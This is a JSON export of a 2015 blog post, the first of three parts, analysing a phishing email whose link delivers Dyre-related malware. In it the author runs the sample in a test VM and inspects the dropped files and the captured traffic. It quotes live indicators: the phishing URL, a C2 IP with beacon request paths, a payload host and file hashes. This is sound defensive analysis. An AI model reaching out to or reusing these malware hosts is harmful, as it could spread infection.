{"id":32,"date":"2015-01-21T23:26:38","date_gmt":"2015-01-21T23:26:38","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=32"},"modified":"2015-01-26T23:07:20","modified_gmt":"2015-01-26T23:07:20","slug":"1-nice-email-subject-employee-documents-internal-use","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=32","title":{"rendered":"Part 1 of 3 : Nice email &#8211; Subject: Employee Documents &#8211; Internal Use"},"content":{"rendered":"<p>So I figured that it is time that I start putting SO (<a href=\"http:\/\/blog.securityonion.net\/p\/securityonion.html\" target=\"_blank\">Security Onion<\/a>) to good use and start trying to find malware to dissect. So I started going through the SPAM\/JUNK mail folders in the different email accounts that I have. After checking several emails, I came across the following email:<\/p>\n<blockquote><p>From: &#8220;invoice&#8221; &lt;no-replay@invoice.com&gt;<br \/>\nTo: &lt;redacted&gt;<br \/>\nSubject: Employee Documents &#8211; Internal Use<\/p><\/blockquote>\n<p>The email headers for this are as follows:<\/p>\n<blockquote><p>Delivered-To: redacted<br \/>\nReceived: by 10.96.187.137 with SMTP id fs9csp1765471qdc;<br \/>\nWed, 21 Jan 2015 04:48:40 -0800 (PST)<br \/>\nX-Received: by 10.229.102.68 with SMTP id f4mr57827176qco.15.1421844520124;<br \/>\nWed, 21 Jan 2015 04:48:40 -0800 (PST)<br \/>\nReturn-Path: &lt;no-replay@invoice.com&gt;<br \/>\nReceived: from invoice.com ([104.156.69.202])<br \/>\nby mx.google.com with ESMTP id 94si25733409qge.76.2015.01.21.04.48.39<br \/>\nfor &lt;redacted&gt;;<br \/>\nWed, 21 Jan 2015 04:48:40 -0800 (PST)<br \/>\nReceived-SPF: fail (google.com: domain of no-replay@invoice.com does not designate 104.156.69.202 as permitted sender) client-ip=104.156.69.202;<br \/>\nAuthentication-Results: mx.google.com;<br \/>\nspf=fail (google.com: domain of no-replay@invoice.com does not designate 104.156.69.202 as permitted sender) smtp.mail=no-replay@invoice.com<\/p><\/blockquote>\n<p>The text of the email is as follows:<\/p>\n<blockquote><p>DOCUMENT NOTIFICATION, Powered by NetDocuments<\/p>\n<p>DOCUMENT NAME: Employee Documents<\/p>\n<p>DOCUMENT LINK: hxxp:\/\/y-design[dot]promagnumcorp[dot]com\/CUSTOMER-DOCUMENT_STORAGE~DATA\/get[dot]document[dot]html<\/p>\n<p>Documents are encrypted in transit and store in a secure repository<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>\nThis message may contain information that is privileged and confidential.<br \/>\nIf you received this transmission in error, please notify the sender by reply<br \/>\nemail and delete the message and any attachments.<\/p><\/blockquote>\n<p><!--more--><\/p>\n<p>Here is the account of what happened once I copied the link over into IE and executed it.<\/p>\n<p>Page that loaded from the above link:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/Landing-Page.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-34\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/Landing-Page.png\" alt=\"Landing Page\" width=\"1280\" height=\"800\" \/><\/a><\/p>\n<p>Here is the pop-up once I have downloaded the file from the bar at the top of IE:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/After-Download-from-pop-up.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-36\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/After-Download-from-pop-up.png\" alt=\"After Download from pop-up\" width=\"1280\" height=\"800\" \/><\/a><\/p>\n<p>Here is the details of the file from the zip archive that was downloaded from above:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/EXE-File-Properties.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-37\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/EXE-File-Properties.png\" alt=\"EXE File Properties\" width=\"471\" height=\"476\" \/><\/a><\/p>\n<p>One I ran the &#8220;Invoice_PDF20811.exe&#8221; file, I started watching the TEMP folder (C:\\Users\\%username%\\AppData\\Local\\Temp) to see what was &#8220;dropped&#8221; into it. There were three files that were created in that folder. Unfortunately I was not able to see\/copy the third file as it was created and then deleted quickly (along with the Invoice_PDF20811.exe file). The following files were left in the TEMP directory:<\/p>\n<blockquote><p>&#8211; informix.exe: 15.5KB<br \/>\n&#8211; SHA256 a7f9da480d1ac3c14172bfe6468afcf5d850fa842ce48bd2ef129820b01726ee<br \/>\n&#8211; VirusTotal Link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/a7f9da480d1ac3c14172bfe6468afcf5d850fa842ce48bd2ef129820b01726ee\/analysis\/1421878542\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/a7f9da480d1ac3c14172bfe6468afcf5d850fa842ce48bd2ef129820b01726ee\/analysis\/1421878542\/<\/a><\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/1-of-3-files-dropped-in-Temp-.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-38\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/1-of-3-files-dropped-in-Temp-.png\" alt=\"1 of 3 files dropped in Temp\" width=\"466\" height=\"475\" \/><\/a><\/p>\n<p>&#8211; mix_370.tmp: 422KB<br \/>\n&#8211; File seems to be in Chinese. Google Translate could not decipher it at the time of this writing.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/2-of-3-files-dropped-in-Temp.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-39\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/2-of-3-files-dropped-in-Temp.png\" alt=\"2 of 3 files dropped in Temp\" width=\"1278\" height=\"678\" \/><\/a><\/p><\/blockquote>\n<p>Now time to stop here and smell the roses (per se) and take a look at what the PCAP says. Generally the first thing that I like to do is take a quick glance at things in Wireshark via File &gt; Export &gt; HTTP Objects before I do any kind of filters (just to see if anything stands out). In this case I could see that there was a &#8216;$ctype&#8217; for content-type in two of the connections (which I am assuming is a variable name that did not get cleaned up perhaps), several calls to different websites all requesting the &#8216;jquery-1.41.15.js&#8217; file, and an application\/pdf for content-type for the last connection (possibly the third file that was written and then deleted out of the TEMP folder perhaps?). All this is evidenced below.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/HTTP-Objects.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-43\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/HTTP-Objects.png\" alt=\"HTTP Objects\" width=\"1272\" height=\"377\" \/><\/a><\/p>\n<p>Next, looking at the PCAP via the simple filter &#8216;http.request&#8217; to filter out everything that is not HTTP, I got a better idea of what happened after clicking the file. From what it looks like, once you click on the link to download the file, the landing page (hxxp:\/\/y-design[dot]promagnumcorp[dot]com\/CUSTOMER-DOCUMENT_STORAGE~DATA\/get[dot]document.html) calls several other pages as well. It looks like the file &#8216;invoice_pdf38255.zip&#8217; is not located on the original landing page, but on another one as evidenced below:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/Get-PDF.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-42\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/Get-PDF.png\" alt=\"Get PDF\" width=\"1221\" height=\"521\" \/><\/a><\/p>\n<p>From what I can tell, the page does not make any further calls up to this point. Once I double-clicked on the EXE that was downloaded, there were a couple of other calls that were made to other sites as evidenced in the PCAP below, and also the creation of the &#8216;informix.exe&#8217; file mentioned above.<\/p>\n<p>TCP Stream 33<\/p>\n<blockquote><p>GET \/2101uk22\/VULN-WINDOWS\/0\/61-SP1\/0\/ HTTP\/1.1<br \/>\nUser-Agent: Mazilla\/4.0<br \/>\nHost: 202.153.35.133:44146<br \/>\nCache-Control: no-cache<\/p><\/blockquote>\n<p>TCP Stream 34<\/p>\n<blockquote><p>GET \/2101uk22\/VULN-WINDOWS\/1\/0\/0\/ HTTP\/1.1<br \/>\nUser-Agent: Mazilla\/4.0<br \/>\nHost: 202.153.35.133:44146<br \/>\nCache-Control: no-cache<\/p><\/blockquote>\n<p>**On a side note &#8211; interesting that the GET has the name of my test VM in it.<\/p>\n<p>And then the GET request to pull down what I think is the missing third file that I saw in the TEMP folder that I mentioned above:<\/p>\n<blockquote><p>GET \/mandoc\/info22.pdf HTTP\/1.1<br \/>\nAccept: text\/*, application\/*<br \/>\nUser-Agent: Mazilla\/4.0<br \/>\nHost: dipford.com<br \/>\nCache-Control: no-cache<\/p>\n<p>HTTP\/1.1 200 OK<br \/>\nDate: Wed, 21 Jan 2015 21:24:57 GMT<br \/>\nLast-Modified: Wed, 21 Jan 2015 07:29:23 GMT<br \/>\nAccept-Ranges: bytes<br \/>\nContent-Length: 431558<br \/>\nContent-Type: application\/pdf<br \/>\nSet-Cookie: TS0194eee0=0187bed8eaf0810c7fa67d5f0c5f0efc699810905f3775c5b2221ba89cd95dd7bb4cec6ab2; Path=\/<\/p><\/blockquote>\n<p>The last call in the PCAP is this:<\/p>\n<blockquote><p>GET \/2101uk22\/VULN-WINDOWS\/41\/7\/4\/ HTTP\/1.1<br \/>\nUser-Agent: Mazilla\/4.0<br \/>\nHost: 202.153.35.133:44130<br \/>\nCache-Control: no-cache<\/p><\/blockquote>\n<p>With a simple click of a link, downloading and running the EXE file, I get all the above traffic. And from this simple action, this is what Security Onion is telling me:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/Security-Onion-results-from-first-run.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-44\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/Security-Onion-results-from-first-run.png\" alt=\"Security Onion results from first run\" width=\"1050\" height=\"440\" \/><\/a><\/p>\n<p>With that said, I will dig into this further as I am seeing the event &#8220;ET TROJAN Possible Dyre SSL Cert (fake state)&#8221; has gone up from 17 to now 58 in about two hours. Plus I need to find out what happens if I click on the &#8216;informix.exe&#8217; file as well. Off to bed now.<\/p>\n<p><strong>Update 01.25.2015<\/strong><\/p>\n<p>I forgot to save the\u00a0dyre-malware to this post that I was able to get from this malware (the invoice_pdf.exe file was saved from the PCAP since it was deleted previously) along with the saved <a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/01\/dyre1.pcap\">PCAP<\/a>. Unfortunately the zip file holding the files was corrupt. 8-(<\/p>\n","protected":false},"excerpt":{"rendered":"<p>So I figured that it is time that I start putting SO (Security Onion) to good use and start trying to find malware to dissect. So I started going through the SPAM\/JUNK mail folders in the different email accounts that I have. After checking several emails, I came across the following email: From: &#8220;invoice&#8221; &lt;no-replay@invoice.com&gt; To: &lt;redacted&gt; Subject: Employee Documents &#8211; Internal Use The email headers for this are as follows: Delivered-To: redacted Received: by 10.96.187.137 with SMTP id fs9csp1765471qdc; Wed, 21 Jan 2015 04:48:40 -0800 (PST) X-Received: by 10.229.102.68 with SMTP id f4mr57827176qco.15.1421844520124; Wed, 21 Jan 2015 04:48:40 -0800&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=32\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-32","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/32","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=32"}],"version-history":[{"count":14,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/32\/revisions"}],"predecessor-version":[{"id":77,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/32\/revisions\/77"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=32"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=32"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=32"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}